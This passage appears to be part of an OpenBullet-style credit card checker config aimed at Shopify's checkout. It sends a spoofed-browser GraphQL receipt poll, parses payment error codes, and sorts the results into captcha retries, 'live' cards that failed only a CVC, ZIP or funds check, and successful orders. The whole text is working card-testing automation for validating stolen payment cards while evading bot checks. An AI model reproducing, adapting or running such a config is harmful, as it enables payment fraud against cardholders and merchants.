  CONTENT "{\"query\":\"query PollForReceipt($receiptId:ID!,$sessionToken:String!){receipt(receiptId:$receiptId,sessionInput:{sessionToken:$sessionToken}){...ReceiptDetails __typename}}fragment ReceiptDetails on Receipt{...on ProcessedReceipt{id token redirectUrl confirmationPage{url shouldRedirect __typename}orderStatusPageUrl shopPay shopPayInstallments paymentExtensionBrand analytics{checkoutCompletedEventId emitConversionEvent __typename}poNumber orderIdentity{buyerIdentifier id __typename}customerId isFirstOrder eligibleForMarketingOptIn purchaseOrder{...ReceiptPurchaseOrder __typename}orderCreationStatus{__typename}paymentDetails{paymentCardBrand creditCardLastFourDigits paymentAmount{amount currencyCode __typename}paymentGateway financialPendingReason paymentDescriptor buyerActionInfo{...on MultibancoBuyerActionInfo{entity reference __typename}__typename}paymentIcon __typename}shopAppLinksAndResources{mobileUrl qrCodeUrl canTrackOrderUpdates shopInstallmentsViewSchedules shopInstallmentsMobileUrl installmentsHighlightEligible mobileUrlAttributionPayload shopAppEligible shopAppQrCodeKillswitch shopPayOrder payEscrowMayExist buyerHasShopApp buyerHasShopPay orderUpdateOptions __typename}postPurchasePageUrl postPurchasePageRequested postPurchaseVaultedPaymentMethodStatus paymentFlexibilityPaymentTermsTemplate{__typename dueDate dueInDays id translatedName type}completedRemoteCheckouts{...CompletedRemoteCheckouts __typename}consolidatedTotals{subtotalBeforeTaxesAndShipping{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}subtotalBeforeReductions{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}runningTotal{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}totalSavings{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}total{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotalTaxes{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotalBeforeTaxesAndShipping{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotal{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}__typename}consolidatedTaxes{totalTaxAmount{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}totalTaxAndDutyAmount{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}taxesIncludedAmountInTarget{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}__typename}consolidatedProposedSubtotalBeforeTaxesAndShipping{amount currencyCode __typename}__typename}...on ProcessingReceipt{id purchaseOrder{...ReceiptPurchaseOrder __typename}pollDelay __typename}...on WaitingReceipt{id pollDelay __typename}...on ProcessingRemoteCheckoutsReceipt{id pollDelay remoteCheckouts{...on SubmittingRemoteCheckout{shopId __typename}...on SubmittedRemoteCheckout{shopId __typename}...on FailedRemoteCheckout{shopId __typename}__typename}__typename}...on ActionRequiredReceipt{id action{...on CompletePaymentChallenge{offsiteRedirect url __typename}...on CompletePaymentChallengeV2{challengeType challengeData __typename}__typename}timeout{millisecondsRemaining __typename}__typename}...on FailedReceipt{id processingError{...on InventoryClaimFailure{__typename}...on InventoryReservationFailure{__typename}...on OrderCreationFailure{paymentsHaveBeenReverted __typename}...on OrderCreationSchedulingFailure{__typename}...on PaymentFailed{code messageUntranslated hasOffsitePaymentMethod __typename}...on DiscountUsageLimitExceededFailure{__typename}...on CustomerPersistenceFailure{__typename}__typename}__typename}__typename}fragment ReceiptPurchaseOrder on PurchaseOrder{__typename sessionToken totalAmountToPay{amount currencyCode __typename}checkoutCompletionTarget delivery{...on PurchaseOrderDeliveryTerms{splitShippingToggle deliveryLines{__typename availableOn deliveryStrategy{handle title description methodType brandedPromise{handle logoUrl lightThemeLogoUrl darkThemeLogoUrl lightThemeCompactLogoUrl darkThemeCompactLogoUrl name __typename}pickupLocation{...on PickupInStoreLocation{name address{address1 address2 city countryCode zoneCode postalCode phone coordinates{latitude longitude __typename}__typename}instructions __typename}...on PickupPointLocation{address{address1 address2 address3 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}__typename}carrierCode carrierName name carrierLogoUrl fromDeliveryOptionGenerator __typename}__typename}deliveryPromisePresentmentTitle{short long __typename}deliveryStrategyBreakdown{__typename amount{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}discountRecurringCycleLimit excludeFromDeliveryOptionPrice flatRateGroupId targetMerchandise{...on PurchaseOrderMerchandiseLine{stableId quantity{...on PurchaseOrderMerchandiseQuantityByItem{items __typename}__typename}merchandise{...on ProductVariantSnapshot{...ProductVariantSnapshotMerchandiseDetails __typename}__typename}legacyFee __typename}...on PurchaseOrderBundleLineComponent{stableId quantity merchandise{...on ProductVariantSnapshot{...ProductVariantSnapshotMerchandiseDetails __typename}__typename}__typename}__typename}}__typename}lineAmount{amount currencyCode __typename}lineAmountAfterDiscounts{amount currencyCode __typename}destinationAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}__typename}groupType targetMerchandise{...on PurchaseOrderMerchandiseLine{stableId quantity{...on PurchaseOrderMerchandiseQuantityByItem{items __typename}__typename}merchandise{...on ProductVariantSnapshot{...ProductVariantSnapshotMerchandiseDetails __typename}__typename}legacyFee __typename}...on PurchaseOrderBundleLineComponent{stableId quantity merchandise{...on ProductVariantSnapshot{...ProductVariantSnapshotMerchandiseDetails __typename}__typename}__typename}__typename}}__typename}__typename}deliveryExpectations{__typename brandedPromise{name logoUrl handle lightThemeLogoUrl darkThemeLogoUrl __typename}deliveryStrategyHandle deliveryExpectationPresentmentTitle{short long __typename}returnability{returnable __typename}}payment{...on PurchaseOrderPaymentTerms{billingAddress{__typename...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}}paymentLines{amount{amount currencyCode __typename}postPaymentMessage dueAt due{...on PaymentLineDueEvent{event __typename}...on PaymentLineDueTime{time __typename}__typename}paymentMethod{...on DirectPaymentMethod{sessionId paymentMethodIdentifier vaultingAgreement creditCard{brand lastDigits __typename}billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on CustomerCreditCardPaymentMethod{id brand displayLastDigits token deletable defaultPaymentMethod requiresCvvConfirmation firstDigits billingAddress{...on StreetAddress{address1 address2 city company countryCode firstName lastName phone postalCode zoneCode __typename}__typename}__typename}...on PurchaseOrderGiftCardPaymentMethod{balance{amount currencyCode __typename}code __typename}...on WalletPaymentMethod{name walletContent{...on ShopPayWalletContent{billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}...on InvalidBillingAddress{__typename}__typename}sessionToken paymentMethodIdentifier paymentMethod paymentAttributes __typename}...on PaypalWalletContent{billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}...on InvalidBillingAddress{__typename}__typename}email payerId token expiresAt __typename}...on ApplePayWalletContent{billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}...on InvalidBillingAddress{__typename}__typename}data signature version __typename}...on GooglePayWalletContent{billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}...on InvalidBillingAddress{__typename}__typename}signature signedMessage protocolVersion __typename}...on ShopifyInstallmentsWalletContent{autoPayEnabled billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}...on InvalidBillingAddress{__typename}__typename}disclosureDetails{evidence id type __typename}installmentsToken sessionToken creditCard{brand lastDigits __typename}__typename}__typename}__typename}...on WalletsPlatformPaymentMethod{name walletParams __typename}...on LocalPaymentMethod{paymentMethodIdentifier name displayName billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on PaymentOnDeliveryMethod{additionalDetails paymentInstructions paymentMethodIdentifier billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on OffsitePaymentMethod{paymentMethodIdentifier name billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on ManualPaymentMethod{additionalDetails name paymentInstructions id paymentMethodIdentifier billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on CustomPaymentMethod{additionalDetails name paymentInstructions id paymentMethodIdentifier billingAddress{...on StreetAddress{name firstName lastName company address1 address2 city countryCode zoneCode postalCode coordinates{latitude longitude __typename}phone __typename}...on InvalidBillingAddress{__typename}__typename}__typename}...on DeferredPaymentMethod{orderingIndex displayName __typename}...on PaypalBillingAgreementPaymentMethod{token billingAddress{...on StreetAddress{address1 address2 city company countryCode firstName lastName phone postalCode zoneCode __typename}__typename}__typename}...on RedeemablePaymentMethod{redemptionSource redemptionContent{...on ShopCashRedemptionContent{redemptionPaymentOptionKind billingAddress{...on StreetAddress{firstName lastName company address1 address2 city countryCode zoneCode postalCode phone __typename}__typename}redemptionId details{redemptionId sourceAmount{amount currencyCode __typename}destinationAmount{amount currencyCode __typename}redemptionType __typename}__typename}...on CustomRedemptionContent{redemptionAttributes{key value __typename}maskedIdentifier paymentMethodIdentifier __typename}...on StoreCreditRedemptionContent{storeCreditAccountId __typename}__typename}__typename}...on CustomOnsitePaymentMethod{paymentMethodIdentifier name __typename}__typename}__typename}__typename}__typename}buyerIdentity{...on PurchaseOrderBuyerIdentityTerms{contactMethod{...on PurchaseOrderEmailContactMethod{email __typename}...on PurchaseOrderSMSContactMethod{phoneNumber __typename}__typename}marketingConsent{...on PurchaseOrderEmailContactMethod{email __typename}...on PurchaseOrderSMSContactMethod{phoneNumber __typename}__typename}__typename}customer{__typename...on GuestProfile{presentmentCurrency countryCode market{id handle __typename}__typename}...on DecodedCustomerProfile{id presentmentCurrency fullName firstName lastName countryCode email imageUrl acceptsSmsMarketing acceptsEmailMarketing ordersCount phone __typename}...on BusinessCustomerProfile{checkoutExperienceConfiguration{editableShippingAddress __typename}id presentmentCurrency fullName firstName lastName acceptsSmsMarketing acceptsEmailMarketing countryCode imageUrl email ordersCount phone market{id handle __typename}__typename}}purchasingCompany{company{id externalId name __typename}contact{locationCount __typename}location{id externalId name __typename}__typename}__typename}merchandise{taxesIncluded merchandiseLines{stableId legacyFee merchandise{...ProductVariantSnapshotMerchandiseDetails __typename}lineAllocations{checkoutPriceAfterDiscounts{amount currencyCode __typename}checkoutPriceAfterLineDiscounts{amount currencyCode __typename}checkoutPriceBeforeReductions{amount currencyCode __typename}quantity stableId totalAmountAfterDiscounts{amount currencyCode __typename}totalAmountAfterLineDiscounts{amount currencyCode __typename}totalAmountBeforeReductions{amount currencyCode __typename}discountAllocations{__typename amount{amount currencyCode __typename}discount{...DiscountDetailsFragment __typename}}unitPrice{measurement{referenceUnit referenceValue __typename}price{amount currencyCode __typename}__typename}__typename}lineComponents{...PurchaseOrderBundleLineComponent __typename}quantity{__typename...on PurchaseOrderMerchandiseQuantityByItem{items __typename}}recurringTotal{fixedPrice{__typename amount currencyCode}fixedPriceCount interval intervalCount recurringPrice{__typename amount currencyCode}title __typename}lineAmount{__typename amount currencyCode}__typename}__typename}tax{totalTaxAmountV2{__typename amount currencyCode}totalDutyAmount{amount currencyCode __typename}totalTaxAndDutyAmount{amount currencyCode __typename}totalAmountIncludedInTarget{amount currencyCode __typename}__typename}discounts{lines{...PurchaseOrderDiscountLineFragment __typename}__typename}legacyRepresentProductsAsFees totalSavings{amount currencyCode __typename}subtotalBeforeTaxesAndShipping{amount currencyCode __typename}legacySubtotalBeforeTaxesShippingAndFees{amount currencyCode __typename}legacyAggregatedMerchandiseTermsAsFees{title description total{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}__typename}landedCostDetails{incotermInformation{incoterm reason __typename}__typename}optionalDuties{buyerRefusesDuties refuseDutiesPermitted __typename}dutiesIncluded tip{tipLines{amount{amount currencyCode __typename}__typename}__typename}hasOnlyDeferredShipping note{customAttributes{key value __typename}message __typename}shopPayArtifact{optIn{vaultPhone __typename}__typename}recurringTotals{fixedPrice{amount currencyCode __typename}fixedPriceCount interval intervalCount recurringPrice{amount currencyCode __typename}title __typename}checkoutTotalBeforeTaxesAndShipping{__typename amount currencyCode}checkoutTotal{__typename amount currencyCode}checkoutTotalTaxes{__typename amount currencyCode}subtotalBeforeReductions{__typename amount currencyCode}subtotalAfterMerchandiseDiscounts{__typename amount currencyCode}deferredTotal{amount{__typename...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}}dueAt subtotalAmount{__typename...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}}taxes{__typename...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}}__typename}metafields{key namespace value valueType:type __typename}}\",\"variables\":{\"receiptId\":\"<bill>\",\"sessionToken\":\"<x_check>\"},\"operationName\":\"PollForReceipt\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "x-checkout-one-session-token: <x_check>" 
  HEADER "x-checkout-web-build-id: <web_build>" 
  HEADER "x-checkout-web-deploy-stage: production" 
  HEADER "x-checkout-web-server-handling: fast" 
  HEADER "x-checkout-web-server-rendering: yes" 
  HEADER "x-checkout-web-source-id: <tok>" 

#cc_raw PARSE "<SOURCE>" LR "" "" -> VAR "cc_raw" 

#cc_status PARSE "<SOURCE>" LR "\"code\":\"" "\"," CreateEmpty=FALSE -> CAP "cc_status" 

#cc_status4 PARSE "<SOURCE>" LR "\"confirmationPage\":{\"url\":\"" "\",\"shouldRedirect\"" CreateEmpty=FALSE -> VAR "cc_status4" 

#cc_status5 PARSE "<SOURCE>" LR "\"url\":\"" "\",\"" CreateEmpty=FALSE -> CAP "cc_status5" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<cc_status>" Contains "CAPTCHA_REQUIRED" 
    KEY "Just a moment" 
    KEY "<cc_status>" EqualTo "CAPTCHA_REQUIRED" 
    KEY "Invalid global id" 
    KEY "<cc_raw>" Contains "Invalid global id" 
    KEY "<cc_raw>" Contains "HCAPTCHA_DETECTED" 
    KEY "<cc_raw>" Contains "SITE_CAPTCHA_BLOCK" 
  KEYCHAIN Retry OR 
    KEY "<cc_status>" Contains "CAPTCHA_REQUIRED" 
    KEY "Just a moment" 
    KEY "<cc_status>" EqualTo "CAPTCHA_REQUIRED" 
    KEY "Invalid global id" 
    KEY "<cc_raw>" Contains "Invalid global id" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<cc_status>" Contains "GENERIC_ERROR" 
    KEY "<cc_status>" Contains "CARD_DECLINED" 
    KEY "<cc_status>" Contains "INCORRECT_NUMBER" 
    KEY "<cc_status>" Contains "AUTHENTICATION_FAILED" 
    KEY "<cc_status>" Contains "FRAUD_SUSPECTED" 
    KEY "<cc_raw>" Contains "INCORRECT_NUMBER" 
    KEY "<cc_raw>" Contains "CARD_DECLINED" 
    KEY "<cc_raw>" Contains "PaymentFailed" 
    KEY "<cc_raw>" Contains "INCORRECT_ADDRESS" 
    KEY "<cc_raw>" Contains "INCORRECT_ZIP" 
    KEY "<cc_raw>" Contains "INCORRECT_PIN" 
    KEY "<cc_raw>" Contains "INSUFFICIENT_FUNDS" 
    KEY "<cc_raw>" Contains "INVALID_CVC" 
    KEY "<cc_raw>" Contains "INCORRECT_CVC" 
    KEY "<cc_raw>" Contains "CompletePaymentChallenge" 
    KEY "<cc_raw>" Contains "3DS_REQUIRED" 
    KEY "<bill>" DoesNotContain "" 
    KEY "<bill>" NotEqualTo "" 
    KEY "<bill>" Contains "gid://" 
  KEYCHAIN Success OR 
    KEY "<cc_status>" Contains "ORDER_PLACED" 
    KEY "<cc_status>" EqualTo "ORDER_PLACED" 
    KEY "ORDER_PLACED" 
    KEY "<cc_raw>" Contains "ORDER_PLACED" 
    KEY "<cc_raw>" Contains "shopify_payments" 
    KEY "<cc_status4>" Contains "thank_you" 
    KEY "<cc_status5>" Contains "thank_you" 
    KEY "<cc_raw>" Contains "thank_you" 
    KEY "<cc_raw>" Contains "thank" 
    KEY "<cc_raw>" Contains "ProcessedReceipt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<cc_raw>" Contains "AUTHENTICATION_FAILED" 
    KEY "<cc_raw>" Contains "insufficient_funds" 
    KEY "<cc_status>" Contains "INSUFFICIENT_FUNDS" 
    KEY "<cc_raw>" Contains "CompletePaymentChallenge" 
    KEY "<cc_raw>" Contains "ProcessingReceipt" 
    KEY "<cc_status>" Contains "INCORRECT_ADDRESS" 
    KEY "<cc_status>" Contains "INCORRECT_ZIP" 
    KEY "<cc_status>" Contains "INCORRECT_PIN" 
    KEY "<cc_status>" Contains "INCORRECT_CVC" 

#Gateway FUNCTION Constant "Shopify 👀" -> CAP "Gateway" 
